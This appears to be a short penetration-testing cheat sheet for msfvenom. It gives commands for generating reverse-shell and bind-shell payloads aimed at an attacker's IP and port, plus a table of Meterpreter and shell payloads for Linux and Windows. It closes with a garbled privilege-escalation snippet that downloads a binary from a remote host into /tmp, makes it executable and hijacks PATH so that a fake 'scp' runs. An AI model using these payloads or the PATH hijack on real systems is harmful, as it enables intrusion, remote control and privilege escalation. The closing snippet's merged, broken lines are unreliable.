msfvenom
Show all payloads
msfvenom -l payloads
Show all payload formats
msfvenom -l formats
Generate a payload
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output payload file name>
Common payloads
meterpreter
linux/x86/meterpreter/reverse_tcp | linux x86 reverse shell |
linux/x64/meterpreter/reverse_tcp | linux x64 reverse shell |
windows/meterpreter/reverse_tcp | windows x86 reverse shell |
windows/x64/meterpreter/reverse_tcp | windows x64 reverse shell |
Staged
linux/x86/shell/bind_tcp | linux x86 bind shell |
linux/x86/shell/reverse_tcp | linux x86 reverse shell |
windows/shell/bind_tcp | windows x86 bind shell |
windows/shell/reverse_tcp | windows x86 reverse shell |
Nonstaged
linux/x86/shell_bind_tcp | linux x86 bind shell |
linux/x86/shell_reverse_tcp | linux x86 reverse shell |
windows/shell_bind_tcp | windows x86 bind shell |
windows/shell_reverse_tcp | windows x86 reverse shell |
MSFVENOM PAYLOAD
Linux
Windows
PHP
ASP
JSP
WAR
Python
Bash
Perl
Listener
Metasploit
this creates a command for scp.
wget 192.168.1.23/scp -O /tmp/s** # transfer the exec binary over to Sufferance chmod 755 /tmp/scp
export PATH=/tmp:$PATH --> it sets the tmp as the path
/usr/local/bin/ # it'll now call our "special" scp binary in /tmp instead
Last updated